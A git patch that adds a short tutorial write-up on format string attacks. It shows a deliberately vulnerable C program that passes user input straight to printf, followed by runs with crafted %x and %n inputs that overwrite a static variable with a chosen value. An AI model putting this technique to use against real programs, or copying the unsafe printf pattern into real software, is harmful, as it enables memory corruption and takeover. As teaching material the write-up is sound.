From efa24b220d9633d5d7bfef632b33df180dcb0e74 Mon Sep 17 00:00:00 2001 From: FreeArtMan Date: Thu, 27 May 2021 21:10:45 +0100 Subject: Update 10 html to md articles --- md/writeup/linux_format_string_attack.md | 122 +++++++++++++++++++++++++++++++ 1 file changed, 122 insertions(+) create mode 100644 md/writeup/linux_format_string_attack.md (limited to 'md/writeup/linux_format_string_attack.md') diff --git a/md/writeup/linux_format_string_attack.md b/md/writeup/linux_format_string_attack.md new file mode 100644 index 0000000..cbffe87 --- /dev/null +++ b/md/writeup/linux_format_string_attack.md @@ -0,0 +1,122 @@ +title:X11 Linux Format String Attack +keywords:linux,c,formatting,printf + +# Linux Format String Attack +Format string attack is attack for C formated strings. Format string +function is prinrf() there are other functions that +support format string.C code for bad used printf(): + +``` +int main( int argc, char **argv ) +{ + static int i = 0; + char text[1000]; + strcpy(text, argv[1]); + printf("%.8x\n",&i); + printf("No way it never will works because value of i=%d\n",i); + printf( text ); + printf("\nValue of i=%d\n",i); + return 0; +} + +``` +First output is address of static iThan we output values of +i and call printf() with first argument fo programm.and +then watching value if i + +Run: + +``` +./e1 'Halolo' +``` + +Output: +``` +08049674 +No way it never will works because value of i=0 +Halolo +Value of i=0 +``` + +Run: +``` +./e1 'Halolo%s' +``` + +Output: +``` +08049674 +No way it never will works because value of i=0Halolo(null) +Value of i=0 +``` + +Run: +``` +./e1 $'\x74\x96\x04\x08_%x' +``` + +Output: +``` +08049674 +No way it never will works because value of i=0 +t?_0 +Value of i=0 +``` + +Read about %n in format string: + +Run: +``` +./e1 $'\x74\x96\x04\x08_%x_%n' +``` + +Output: + +``` +08049674 +No way it never will works because value of i=0 +Segmentation fault +``` + +Run: + +``` +./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n' +``` + +Output: +``` +08049674 +No way it never will works because value of i=0 +t?_0_8_40_4_4_ +Value of i=16 +``` + +Run: + +``` +./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n' +``` + +Output: +``` +08049674 +No way it never will works because value of i=0 +t?_0_8_40_4_000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000004_ +Value of i=1216 +``` + +Now you can input almost any value to i -- cgit v1.2.3